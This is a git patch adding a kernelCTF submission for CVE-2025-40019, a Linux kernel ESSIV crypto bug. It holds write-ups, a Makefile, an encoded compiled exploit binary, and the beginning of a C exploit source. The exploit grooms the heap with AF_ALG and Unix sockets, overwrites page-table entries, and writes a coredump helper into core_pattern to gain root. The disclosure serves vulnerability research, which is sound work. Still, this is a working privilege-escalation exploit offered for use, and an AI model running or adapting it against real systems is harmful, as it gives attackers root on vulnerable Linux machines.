From db228892b4092b663fa93e8707a29804844e9fcb Mon Sep 17 00:00:00 2001 From: Shinkurt <9161100+Shinkurt@users.noreply.github.com> Date: Mon, 27 Apr 2026 07:19:57 -0400 Subject: [PATCH 1/9] Add kernelCTF CVE-2025-40019 mitigation novelty submission --- .../docs/exploit.md | 67 ++ .../docs/novel-techniques.md | 32 + .../docs/vulnerability.md | 48 + .../exploit/mitigation-v4-6.12/Makefile | 10 + .../exploit/mitigation-v4-6.12/exploit | Bin 0 -> 22704 bytes .../exploit/mitigation-v4-6.12/exploit.c | 1017 +++++++++++++++++ .../CVE-2025-40019_mitigation_2/metadata.json | 26 + .../original.tar.gz | Bin 0 -> 21933 bytes 8 files changed, 1200 insertions(+) create mode 100644 pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md create mode 100644 pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md create mode 100644 pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md create mode 100644 pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile create mode 100755 pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit create mode 100644 pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c create mode 100644 pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json create mode 100644 pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/original.tar.gz diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md new file mode 100644 index 000000000..232a48089 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md @@ -0,0 +1,67 @@ +# Exploit + +This submission targets `mitigation-v4-6.12` as a novelty-only follow-up for CVE-2025-40019. The regular vulnerability slot for this CVE and target was already taken; the relevant new part is the page-table adaptation described in `docs/novel-techniques.md`. + +## High-Level Flow + +The exploit turns the ESSIV scatterwalk offset underflow into a 16-byte write through a reclaimed scatterlist entry. + +1. Create a sacrificial AF_ALG AEAD request that builds a chained receive scatterlist. +2. Free that request so the inline first receive SGL, a second receive SGL, and the tag SGL remain as residual slab contents. +3. Reclaim the second receive SGL slab slot with a Unix socket control-buffer allocation containing a crafted scatterlist entry. +4. Reclaim the freed anonymous pipe pages as user page-table pages. +5. Trigger the ESSIV decryption path with `assoclen == 0` and an output length of zero, causing `scatterwalk_ffwd()` to walk the residual SGL chain and write the encrypted IV into a page-table page. +6. Use a two-pass flow: pass 1 leaks the physical base needed for the target mapping, and pass 2 writes a coredump helper into `core_pattern`. + +The exploit does not use user namespaces, `io_uring`, BPF, or a separate KASLR leak service. + +## Scatterlist Shaping + +The trigger sends exactly 32 bytes to `essiv(authenc(hmac(sha256),cbc(aes)),sha256)`. For this transform, the authentication tag size is 32 bytes. During decrypt, `_aead_recvmsg()` computes: + +```text +outlen = used - authsize = 0x20 - 0x20 = 0 +``` + +Because `outlen` is zero, `af_alg_get_rsgl()` does not initialize the receive SGL. The request nevertheless passes the receive SGL to ESSIV as both source and destination. The vulnerable ESSIV offset calculation wraps to `0xfffffff0`, so `scatterwalk_ffwd()` walks past the inline SGL and follows stale chain entries. + +The sacrificial request constructs the stale chain before the trigger request: + +```text +first_rsgl[0..15] -> second_rsgl -> tsgl -> anonymous pipe pages +``` + +After the sacrificial request is freed, the exploit reclaims the `second_rsgl` allocation with a Unix socket `msg_control` buffer. The crafted entry supplies a large length value that steers the final `scatterwalk_ffwd()` position into the stale `tsgl` entries. The `tsgl` entries still encode pages that were freed after pipe closure; those pages are then reclaimed as page-table pages by a controlled `mmap()` spray. + +## IV Encoding + +ESSIV encrypts the IV before copying it back. The exploit embeds AES code so it can precompute an IV that decrypts to the desired 16-byte page-table write for the selected pass. + +In pass 1, the write maps a physical window that contains a known kernel trampoline page. Reading through the resulting huge mapping reveals enough physical address information to derive the `_stext` physical base used by pass 2. + +In pass 2, the write maps the 1 GB physical window containing `core_pattern` and writes the helper payload through the corrupted user mapping. + +## Privilege Escalation + +The payload written into `core_pattern` is: + +```text +|/proc/%P/root/tmp/ex %P +``` + +The `/proc/%P/root` prefix is required because the coredump helper path is resolved outside the process's jail-local mount namespace. The helper reopens the crashing process's standard file descriptors with `pidfd_open()` and `pidfd_getfd()`, then reads the flag from the target VM as root. + +## Reproduction + +Build and run on `mitigation-v4-6.12`: + +```sh +make +./exploit +``` + +For the vulnerability-only KASAN check: + +```sh +./exploit --vuln-trigger +``` diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md new file mode 100644 index 000000000..9648acbb7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md @@ -0,0 +1,32 @@ +# Novel Technique: Huge-PUD Recovery From a Wrong-Level Page-Table Write + +The existing CVE-2025-40019 exploits targeted the same ESSIV scatterwalk primitive, but this submission handles a different landing condition on `mitigation-v4-6.12`: the repeated page-table write landed on a PUD page instead of a PTE page. + +The usual response to this condition is to treat it as a failed PTE hit. This exploit instead converts the wrong-level page-table write into a useful primitive by writing valid 1 GB huge-PUD entries. + +## Why This Works + +The ESSIV primitive gives a 16-byte write, but the copied value is the encrypted IV. By precomputing the IV, the exploit controls the 16 bytes that the kernel writes after ESSIV transforms it. + +When the reclaimed page is a PUD page, those 16 bytes can be used as two adjacent PUD entries. The exploit writes present, user-accessible huge entries that map a chosen 1 GB physical window into userspace. + +The exploit uses this twice: + +1. Pass 1 maps a physical window that exposes a stable kernel address-derived value, then derives the `_stext` physical base. +2. Pass 2 maps the 1 GB physical window containing `core_pattern`, then writes a coredump helper string through the resulting user mapping. + +This avoids needing the ESSIV write to hit a PTE page. It also avoids ROP and avoids depending on user namespaces or `io_uring`. + +## Namespace-Safe Coredump Helper + +The second novelty is operational rather than a new corruption primitive. Writing `|/tmp/ex %P` to `core_pattern` was not reliable in this environment because the kernel resolves the coredump helper outside the jail-local mount namespace. The working payload is: + +```text +|/proc/%P/root/tmp/ex %P +``` + +This resolves the helper through the crashing process's root, so the exploit can install `/tmp/ex` inside the target process namespace while the kernel still starts the correct helper as root. + +## Practical Impact + +This technique makes a page-table exploit usable even when the allocator consistently gives the vulnerable write a PUD page instead of a PTE page. For this target, that changed the result from repeated near-misses into a working mitigation bypass and flag capture. diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md new file mode 100644 index 000000000..38ac9c993 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md @@ -0,0 +1,48 @@ +# CVE-2025-40019 + +## Requirements + +- Capabilities: none +- User namespaces: not required +- io_uring: not required +- Kernel configuration: `CONFIG_CRYPTO_USER_API`, `CONFIG_CRYPTO_USER_API_AEAD`, `CONFIG_CRYPTO_ESSIV` +- Affected component: Linux kernel crypto, ESSIV AEAD template +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6bb73db6948c2de23e407fe1b7ef94bf02b7529f +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be1eb7f78aa8fbe34779c56c266ccd0364604e71 +- Affected versions: v5.4 through v6.18 + +## Summary + +`essiv_aead_crypt()` performs an unchecked unsigned subtraction when copying the encrypted IV back into the destination scatterlist for decryption or in-place encryption. If `req->assoclen` is smaller than the AEAD IV size, the offset passed to `scatterwalk_map_and_copy()` wraps to a large unsigned value. + +The vulnerable path is reachable by an unprivileged local user through AF_ALG AEAD sockets using the ESSIV template, for example `essiv(authenc(hmac(sha256),cbc(aes)),sha256)`. + +## Root Cause + +In the vulnerable code, the decryption and in-place paths copy the transformed IV to: + +```c +scatterwalk_map_and_copy(req->iv, req->dst, + req->assoclen - crypto_aead_ivsize(tfm), + crypto_aead_ivsize(tfm), 1); +``` + +`req->assoclen` and `crypto_aead_ivsize(tfm)` are unsigned. With `assoclen == 0` and `ivsize == 16`, the subtraction becomes `0xfffffff0`. The later `ssize < 0` check existed only in the out-of-place encryption path, so it did not protect decryption or in-place encryption. + +AF_ALG allows userspace to set `ALG_SET_AEAD_ASSOCLEN` to zero and then issue a decrypt request. In `_aead_recvmsg()`, sending exactly the authentication tag size makes the receive output length zero. That causes `af_alg_get_rsgl()` to return without initializing the receive scatterlist, while the ESSIV layer still receives that scatterlist as `req->dst`. + +The wrapped offset makes `scatterwalk_ffwd()` walk beyond the initialized scatterlist entries and eventually treat residual heap data as a scatterlist entry. The ESSIV layer then writes the 16-byte encrypted IV to the page, offset, and length described by that residual or reclaimed entry. + +## Fix + +The fix moves the signed size validation to the start of `essiv_aead_crypt()`, before the decryption and in-place paths can use the underflowed value. + +## Minimal Trigger + +The submitted exploit supports: + +```sh +./exploit --vuln-trigger +``` + +That mode opens the ESSIV AF_ALG AEAD transform, sends a decrypt request with `ALG_SET_AEAD_ASSOCLEN = 0`, and calls `recv()` without the heap grooming or privilege escalation stages. diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile new file mode 100644 index 000000000..fc3f071de --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile @@ -0,0 +1,10 @@ +CC ?= gcc +CFLAGS ?= -O2 -w -DMIT_612 + +all: exploit + +exploit: exploit.c + $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< + +clean: + rm -f exploit diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit new file mode 100755 index 0000000000000000000000000000000000000000..46aaa582d84964cd49fb6daca146cf191b1a9976 GIT binary patch literal 22704 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 chain -> + * second_rsgl -> chain -> tsgl (anonymous pipe pages from splice). + * af_alg_free_resources frees everything; put_page on pipe pages releases + * them to the page allocator. Slab slots retain residual chain links. + * 4. ctl_buf spray: sendmsg on Unix socket with msg_control = 0x208 bytes. + * ____sys_sendmsg does sock_kmalloc -> copy -> sock_kfree_s, reclaiming the + * second_rsgl slab slot with a crafted fake SGL entry (length=0xffffffe0). + * The chain link to old tsgl (at higher offset) is preserved as residual. + * 5. PTE spray + trigger: touch mmap'd pages to allocate PTE pages, reclaiming + * freed pipe pages. ESSIV recv allocates areq from same slab slot; + * scatterwalk_ffwd walks residual chain: 16 x 1 byte -> crafted entry + * (0xffffffe0) -> chain -> tsgl entry -> freed pipe page (now PTE page). + * IV write overwrites a PTE encoding a known physical address. + * 6. Two-pass exploit: pass 1 leaks _stext physical address via PTE remap; + * pass 2 targets core_pattern physical page. Crash child for root. + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SYSCHK(x) ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ +}) + +/* ================================================================== */ +/* Embedded AES-256-ECB (decrypt only) -- derived from tiny-AES-c */ +/* Public domain / CC0: https://github.com/kokke/tiny-AES-c */ +/* ================================================================== */ + +#define AES_BLOCKLEN 16 +#define AES_KEYLEN 32 +#define AES_keyExpSize 240 +#define Nb 4 +#define Nk 8 +#define Nr 14 + +typedef uint8_t state_t[4][4]; + +struct AesCtx { + uint8_t RoundKey[AES_keyExpSize]; +}; + +static const uint8_t sbox[256] = { + 0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76, + 0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0, + 0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15, + 0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75, + 0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84, + 0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf, + 0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8, + 0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2, + 0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73, + 0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb, + 0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79, + 0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08, + 0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a, + 0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e, + 0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf, + 0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16 +}; + +static const uint8_t rsbox[256] = { + 0x52,0x09,0x6a,0xd5,0x30,0x36,0xa5,0x38,0xbf,0x40,0xa3,0x9e,0x81,0xf3,0xd7,0xfb, + 0x7c,0xe3,0x39,0x82,0x9b,0x2f,0xff,0x87,0x34,0x8e,0x43,0x44,0xc4,0xde,0xe9,0xcb, + 0x54,0x7b,0x94,0x32,0xa6,0xc2,0x23,0x3d,0xee,0x4c,0x95,0x0b,0x42,0xfa,0xc3,0x4e, + 0x08,0x2e,0xa1,0x66,0x28,0xd9,0x24,0xb2,0x76,0x5b,0xa2,0x49,0x6d,0x8b,0xd1,0x25, + 0x72,0xf8,0xf6,0x64,0x86,0x68,0x98,0x16,0xd4,0xa4,0x5c,0xcc,0x5d,0x65,0xb6,0x92, + 0x6c,0x70,0x48,0x50,0xfd,0xed,0xb9,0xda,0x5e,0x15,0x46,0x57,0xa7,0x8d,0x9d,0x84, + 0x90,0xd8,0xab,0x00,0x8c,0xbc,0xd3,0x0a,0xf7,0xe4,0x58,0x05,0xb8,0xb3,0x45,0x06, + 0xd0,0x2c,0x1e,0x8f,0xca,0x3f,0x0f,0x02,0xc1,0xaf,0xbd,0x03,0x01,0x13,0x8a,0x6b, + 0x3a,0x91,0x11,0x41,0x4f,0x67,0xdc,0xea,0x97,0xf2,0xcf,0xce,0xf0,0xb4,0xe6,0x73, + 